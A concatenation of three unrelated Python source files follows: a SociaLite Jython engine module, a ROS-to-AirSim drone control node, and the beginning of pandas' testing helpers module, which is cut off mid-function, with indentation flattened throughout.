import socialite.tables.Tuple as Tuple
import socialite.util.SociaLiteException as SociaLiteException
import socialite.type.Utf8 as Utf8
import sys
import java.util.concurrent.atomic.AtomicBoolean as AtomicBool
import java.lang.InterruptedException as JavaInterruptedException
from threading import Thread, InterruptedException, Condition, Lock
from Queue import Queue
__all__ = ['returns', 'cwd', 'chdir', 'store', 'load', 'tables', 'status', 'engine', 'SociaLiteException', 'double']
__doc__ = """
Useful functions:
tables() : shows declared SociaLite tables
status() : shows runtime status of SociaLite
Use backtik(`) to run SociaLite queries
e.g. `Friend(String i, (String f)).` # declares a table Friend having two columns.
`Friend(a,b) :- a="John Smith", b="Jane Doe".` # inserts a tuple into Friend.
for i, f in `Friend(i, f)`: # iterates over tuples in Friend
print i, f
Type help(socialite.examples) to see more SociaLite query examples.
"""
examples="""
`Edge(int i, (int f)).` # declares Edge table (with nested 2nd column).
`Edge(int i:0..1000, (int f)).` # Values of 1st column of Edge is between 0 and 1000
`Edge(s, t) :- l=$read("edges.txt"), # $read returns lines in edges.txt
(a,b)=$split(l, "\\t"),# splits a string with a delimiter, tab here.
s=$toInt(a), # Casting a,b into primitive int.
t=$toInt(b).`
`Foaf(i, f) :- Friend(i,x), Friend(x,f).` # joins Friend table with itself
# to compute friends-of-friends
# and store the result in Foaf.
for i, f in `Foaf(i, f)`: # iterates over tuples in Foaf
print i, f
`FriendCnt(int i, int cnt) groupby(1). # we will apply $inc to the 'cnt' column,
# which requires groupby with one column (column 'i').
FriendCnt(i, $inc(1)) :- Friend(i,f).` # counting the # of friends for each person.
@returns(int) # annotates function return type
def randInt(s, e): # to access it from SociaLite queries
import random as r
return r.randint(s, e)
# Computes average friend counts for randomly selected samples.
`SampleAvg(int i:0..0, Avg avg).
SampleAvg(0, $avg(cnt)) :- i=$randInt(0,100), FriendCnt(i, cnt).`
"""
# Initialize useful functions (help, quit, ...)
import __builtin__
class _Helper(object):
def __init__(self):
global examples
self.socialite = sys.modules[__name__]
self.socialiteExamples = examples
def __repr__(self):
return "Type help(socialite) for help on SociaLite, " \
"or help(object) for help about object."
def __call__(self, *args, **kwds):
if args and args[0]==self.socialite:
print self.socialite.__doc__
return
elif args and args[0]==self.socialiteExamples:
print self.socialite.examples
return
import pydoc
return pydoc.help(*args, **kwds)
def sethelper():
__builtin__.socialite = sys.modules[__name__]
__builtin__.help = _Helper()
import os
def setquit():
"""Define new built-ins 'quit' and 'exit'.
These are simply strings that display a hint on how to exit.
"""
if os.sep == ':':
eof = 'Cmd-Q'
elif os.sep == '\\':
eof = 'Ctrl-Z plus Return'
else:
eof = 'Ctrl-D (i.e. EOF)'
class Quitter(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return 'Use %s() or %s to exit' % (self.name, eof)
def __call__(self, code=None):
# Shells like IDLE catch the SystemExit, but listen when their
# stdin wrapper is closed.
try:
sys.stdin.close()
except:
pass
raise SystemExit(code)
__builtin__.quit = Quitter('quit')
__builtin__.exit = Quitter('exit')
double = float
def internal(f):
f.internal = True
return f
internal.internal = True
isInteractive = False
isClusterEngine = False
engine = None
@internal
def init(cpu=None, dist=False, interactive=False, verbose=None):
verbose = True
global engine, isClusterEngine, isInteractive
if engine==None:
if dist:
engine = ClientEngine()
isClusterEngine = True
else:
engine = LocalEngine()
#if interactive:
# isInteractive = True
# engine = AsyncEngine(engine)
cleanupFuncsBefore =[]
cleanupFuncsAfter =[]
cleanupLock = Lock()
@internal
def registerCleanupOnExit(f, before=True):
try:
cleanupLock.acquire()
if before: cleanupFuncsBefore.append(f)
else: cleanupFuncsAfter.append(f)
finally:
cleanupLock.release()
@internal
def unregisterCleanupOnExit(f):
try:
cleanupLock.acquire()
cleanupFuncsBefore.remove(f)
cleanupFuncsAfter.remove(f)
finally:
cleanupLock.release()
cleanupDone = AtomicBool()
import time
@internal
def cleanupOnExit():
if cleanupDone.compareAndSet(False, True):
for f in cleanupFuncsBefore: f()
#time.sleep(0.02)
engine.shutdown()
for f in cleanupFuncsAfter: f()
#time.sleep(0.02)
def install_funcs():
sethelper()
setquit()
import atexit
atexit.register(cleanupOnExit)
install_funcs()
@internal
def cwd(): return engine.cwd()
@internal
def chdir(path): engine.chdir(path)
@internal
def store(): engine.storeWorkspace()
@internal
def load(): engine.loadWorkspace()
@internal
def tables(verbose=0):
status = engine.status(0)
print status.getTableStatus()
@internal
def status(verbose=0):
write = sys.stdout.write
write("** SociaLite Runtime Status **\n")
status = engine.status(verbose)
write("Number of nodes: "+status.getNodeNum()+"\n")
write("Free memory:\n")
memStat = filter(lambda x:x, status.getMemStatus().split('\n'))
memStat = ''.join(map(lambda x:' '+x+'\n', memStat))
memStat.rstrip(' ')
write(memStat)
write("Recent rules:\n")
progStat = status.getProgress().split('\n')
progStat = ' '+'\n '.join(progStat)
progStat.rstrip(' ')
write(progStat)
@internal
def clear(name): engine.clearTable(name)
@internal
def indent(msg, width=4, indentFirst=True):
if not msg: return msg
tab1=''
if indentFirst:tab1=' '*width
tab=' '*width
msg = tab1+msg.replace('\n','\n'+tab)
return msg.rstrip(' ')
@internal
def _removeStackTrace(msg):
if not msg: return msg
magic="at socialite.dist.master.QueryListener."
if msg.find(magic) >= 0:
msg = msg[:msg.find(magic)].strip()
magic="org.apache.hadoop.ipc.RemoteException:"
if msg.find(magic) == 0:
msg = msg[len(magic):].strip()
return msg
class AsyncEngine:
END = None
def __init__(self, engine):
self.engine = engine
self.q = Queue(maxsize=16)
self.reqThreads = []
reqThreadNum = 2
for i in xrange(reqThreadNum):
t=Thread(target=self.asyncRequest, name="Async Request Thread")
t.start()
self.reqThreads.append(t)
registerCleanupOnExit(self.cleanupReqThreads)
def getTableRef(self, name):
return self.engine.getTableRef(name)
def cleanupReqThreads(self):
try:
#for t in self.reqThreads:
# self.q.put(self.END)
for t in self.reqThreads:
t._thread.interrupt()
except:
pass
#print "Exception in cleanupReqThreads"
def asyncRequest(self):
try:
while True:
tup = self.q.get()
if tup == self.END: break
query, visitor, id, checker = tup
try:
if visitor: self.engine.run(query, visitor, id)
else: self.engine.run(query)
except Exception, e:
type, inst, tb = sys.exc_info()
errhead="Error while running:"
print "\n"+errhead+indent(query, width=len(errhead), indentFirst=False)
print indent(_removeStackTrace(inst.getMessage()))
if visitor:
visitor.raiseError(inst)
checker.done=True
self._notify(checker.cv)
except JavaInterruptedException:
pass
def _notify(self, cv):
cv.acquire()
try: cv.notify()
finally: cv.release()
def _wait(self, cv, timeout=None):
cv.acquire()
try: cv.wait(timeout)
finally: cv.release()
def run(self, program, visitor=None, id=None):
done=[]
class Checker(object): pass
checker = Checker()
checker.cv = Condition()
checker.done=False
self.q.put((program, visitor, id, checker))
self._wait(checker.cv, 3)
if not checker.done and not visitor:
print "... still running the query. Type status() to see the progress."
def cleanupTableIter(self, id):
self.engine.cleanupTableIter(id)
def cwd(self):
self.engine.cwd()
def load(self):
self.engine.load()
def status(self, verbose=0):
return self.engine.status()
def chdir(self, path):
self.engine.chdir(path)
def shutdown(self):
self.engine.shutdown()
def update(self, func):
self.engine.update(func)
def runGc(self):
self.engine.runGc()
@internal
def returns(*types):
def _wrapper(f):
if len(types) == 1:
f.returns = types[0]
else:
f.returns = types
engine.update(f)
return f
return _wrapper
@internal
def passVars(*vars):
tmp=[]
for v in vars:
if type(v) == type(0):
tmp.append(str(v))
elif type(v) == type(0L):
tmp.append(str(v)+"L")
elif type(v) == type(0.0):
tmp.append(str(v))
elif type(v) == type(""):
v = v.replace('"', '\\"')
tmp.append('"'+v+'"')
elif type(v) == type(u""):
v = v.replace('"', '\\"')
tmp.append('"'+v+'"')
elif isinstance(v , Utf8):
v = v.toString().replace('"', '\\"')
tmp.append('u"'+v+'"')
else:
raise SociaLiteException("Only numbers and Strings can be passed to SociaLite queries:"+
str(v)+" is "+str(type(v)))
return tuple(tmp)
class IdFactory:
def __init__(self):
import java.util.concurrent.atomic.AtomicInteger as AtomicInt
self.nextid = AtomicInt()
def next(self):
nextid = self.nextid.getAndIncrement()
return nextid
class TableIterator(QueryVisitor):
END = None
idFactory = IdFactory()
def __init__(self, engine, query):
self.engine = engine
self.query = query
self.q = Queue(maxsize=1024)
self.finished = False
self.cleanupIterDone = AtomicBool()
self.error = None
self.thread = None
self.id = self.idFactory.next()
def startThread(self):
if self.thread: return
self.thread = t = Thread(target=self.run, name="Table Iterator Thread query="+self.query)
registerCleanupOnExit(self.cleanupIterThread, False)
t.start()
def __del__(self):
unregisterCleanupOnExit(self.cleanupIterThread)
self.cleanupIterThread()
def cleanupIterThread(self):
try:
if not self.cleanupIterDone.compareAndSet(False, True):
return
self.finished = True
self.engine.cleanupTableIter(self.id)
self.thread._thread.interrupt()
except:
pass
#print "Exception in cleanupIterThread"
def visit(self, t):
if self.finished: return False
if isinstance(t, Tuple):
cols = []
for i in xrange(t.size()):
cols.append(t.get(i))
self.q.put(tuple(cols))
else: self.q.put(t)
return True
def finish(self):
if self.finished: return
self.q.put(self.END)
def raiseError(self, error):
self.error = error
self.finish()
def run(self):
try:
self.engine.run(self.query, self, self.id)
except SociaLiteException, e1:
e1.printStackTrace()
self.q.put(self.END)
raise e1
except InterruptedException, e3:
return
except Exception, e2:
e2.printStackTrace()
self.q.put(self.END)
raise e2
def __next__(self):
if not self.thread:
self.startThread()
if self.finished or self.error:
raise StopIteration
v = self.q.get()
if self.error:
self.finished = True
raise self.error
if v == self.END:
self.finished = True
raise StopIteration
return v
def next(self):
n = self.__next__()
return n
def isEmpty(self):
try:
self.next()
return False
except StopIteration:
return True
def __iter__(self):
self.startThread()
return self
|
ibvs2airsim.py
|
#!/usr/bin/env python
import cv2
import math
import threading
import time
import yaml
import rospy
from cv_bridge import CvBridge, CvBridgeError
from std_msgs.msg import Bool
from sensor_msgs.msg import Image
from geometry_msgs.msg import TwistStamped
import airsim
class IBVS_To_AirSim():
def __init__(self):
with open('ibvs_parameter.yaml') as f:
para = yaml.load(f)
self.client = airsim.MultirotorClient()
self.client.confirmConnection()
rospy.init_node("IBVS_To_AirSim_node", anonymous=True)
rospy.Subscriber(para['LAND_TOPIC'], Bool, self._land)
rospy.Subscriber(para['FIX_POSE_TOPIC'], Bool, self._fix_pose)
rospy.Subscriber(para['CMD_VEL_TOPIC'], TwistStamped, self._set_vel)
def __call__(self):
vx, vy, vz, vw = 0, 0, 0, 0
self.land = False
self.fix_pose = True
self.land_done = False
self.fix_pose_done = False
self.take_off_done = False
self.bridge = CvBridge()
self.image_pub = rospy.Publisher('/airsim/image_raw', Image, queue_size=1)
rate = 5
r = rospy.Rate(rate)
#threading.Thread(target=self._camera_thread).start()
while not rospy.is_shutdown():
#print(self.land, self.land_done, self.fix_pose, self.fix_pose_done, self.take_off_done)
self.get_image_and_publish()
if self.land:
if not self.land_done:
self.client.reset()
self.land_done = True
print('Landing Done')
else:
pass
#print('Landing Has Done')
else:
if self.fix_pose:
if self.take_off_done:
if self.fix_pose_done:
pass
#print('Fix Pose Has Done')
else:
self.client.moveToPositionAsync(0, 0, -8, 5).join()
self.fix_pose_done = True
print('Fix Pose Done')
else:
self.client.enableApiControl(True)
self.client.armDisarm(True)
print('Wait For take off')
self.client.takeoffAsync().join()
self.take_off_done = True
print('Take off Done')
else:
self.fix_pose_done = False
vx, vy, vz, vw = self.desire_vel
#vx, vy, vz, vw = [0, 0, 0, 20]
print(vx, vy, vz, vw)
self.client.rotateByYawRateAsync(vw, 0.1)
self.client.moveByVelocityAsync(vx, vy, vz, 0.1)
r.sleep()
def get_image_and_publish(self):
image = self.client.simGetImage("0", airsim.ImageType.Scene)
image = cv2.imdecode(
airsim.string_to_uint8_array(image),
cv2.IMREAD_UNCHANGED)[:, :, :3]
self.image_pub.publish(self.bridge.cv2_to_imgmsg(image, 'bgr8'))
def _camera_thread(self):
rate = 10.
r = rospy.Rate(rate)
image_pub = rospy.Publisher('/airsim/image_raw', Image, queue_size=1)
while not rospy.is_shutdown():
image = self.client.simGetImage("0", airsim.ImageType.Scene).join()
image = cv2.imdecode(
airsim.string_to_uint8_array(image),
cv2.IMREAD_UNCHANGED)[:, :, :3]
image_pub.publish(self.bridge.cv2_to_imgmsg(image, 'bgr8'))
r.sleep()
def _land(self, land_topic):
self.land = land_topic.data
self.land_done = False
if not land_topic.data:
self.take_off_done = False
def _fix_pose(self, fix_pose_topic):
self.fix_pose = fix_pose_topic.data
def _set_vel(self, twist_topic):
self.desire_vel = [
twist_topic.twist.linear.x,
twist_topic.twist.linear.y,
twist_topic.twist.linear.z,
twist_topic.twist.angular.z * 180 / math.pi]
ibvs2airsim = IBVS_To_AirSim()
ibvs2airsim()
|
__init__.py
|
from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_float_dtype,
is_integer_dtype,
is_sequence,
is_unsigned_integer_dtype,
pandas_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_indexing_slices_equivalent,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_metadata_equivalent,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import ( # noqa:F401
get_dtype,
get_obj,
)
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.api import (
Float64Index,
Int64Index,
NumericIndex,
UInt64Index,
)
from pandas.core.arrays import (
BaseMaskedArray,
ExtensionArray,
PandasArray,
)
from pandas.core.arrays._mixins import NDArrayBackedExtensionArray
from pandas.core.construction import extract_array
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_NUMPY_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_INT_EA_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_NUMPY_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_INT_EA_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_NUMPY_DTYPES = UNSIGNED_INT_NUMPY_DTYPES + SIGNED_INT_NUMPY_DTYPES
ALL_INT_EA_DTYPES = UNSIGNED_INT_EA_DTYPES + SIGNED_INT_EA_DTYPES
FLOAT_NUMPY_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_NUMPY_DTYPES = FLOAT_NUMPY_DTYPES + ALL_INT_NUMPY_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_NUMPY_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NARROW_NP_DTYPES = [
np.float16,
np.float32,
np.int8,
np.int16,
np.int32,
np.uint8,
np.uint16,
np.uint32,
]
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
NP_NAT_OBJECTS = [
cls("NaT", unit)
for cls in [np.datetime64, np.timedelta64]
for unit in [
"Y",
"M",
"W",
"D",
"h",
"m",
"s",
"ms",
"us",
"ns",
"ps",
"fs",
"as",
]
]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
if isinstance(expected, RangeIndex):
# pd.array would return an IntegerArray
expected = PandasArray(np.asarray(expected._values))
else:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index._with_infer(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is np.ndarray or box_cls is np.array:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
"""
Similar to pd.array, but does not cast numpy dtypes to nullable dtypes.
"""
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if dtype is None:
return np.asarray(obj)
return extract_array(obj, extract_numpy=True)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
"""make a length k index or n categories"""
x = rands_array(nchars=4, size=n, replace=False)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
"""make a length k IntervalIndex"""
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeNumericIndex(k=10, name=None, *, dtype):
dtype = pandas_dtype(dtype)
assert isinstance(dtype, np.dtype)
if is_integer_dtype(dtype):
values = np.arange(k, dtype=dtype)
if is_unsigned_integer_dtype(dtype):
values += 2 ** (dtype.itemsize * 8 - 1)
elif is_float_dtype(dtype):
values = np.random.random_sample(k) - np.random.random_sample(1)
values.sort()
values = values * (10 ** np.random.randint(0, 9))
else:
raise NotImplementedError(f"wrong dtype {dtype}")
return NumericIndex(values, dtype=dtype, name=name)
def makeIntIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="int64")
return Int64Index(base_idx)
def makeUIntIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="uint64")
return UInt64Index(base_idx)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="float64")
return Float64Index(base_idx)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
N = (k // 2) + 1
rng = range(N)
mi = MultiIndex.from_product([("foo", "bar"), rng], names=names, **kwargs)
assert len(mi) >= k # GH#38795
return mi[:k]
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def make_rand_series(name=None, dtype=np.float64):
index = makeStringIndex(_N)
data = np.random.randn(_N)
data = data.astype(dtype, copy=False)
return Series(data, index=index, name=name)
def makeFloatSeries(name=None):
return make_rand_series(name=name)
def makeStringSeries(name=None):
return make_rand_series(name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# Deprecated since version 3.9: collections.Counter now supports []. See PEP 585
# and Generic Alias Type.
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
